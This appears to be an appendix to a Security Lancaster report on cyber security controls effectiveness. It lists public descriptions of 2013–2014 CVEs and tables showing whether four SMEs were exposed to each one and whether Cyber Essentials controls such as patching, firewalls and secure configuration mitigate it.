CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.

Survey Responses



CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 15 of 28

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, AntiDOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | nn | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration


CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.01 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1 and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

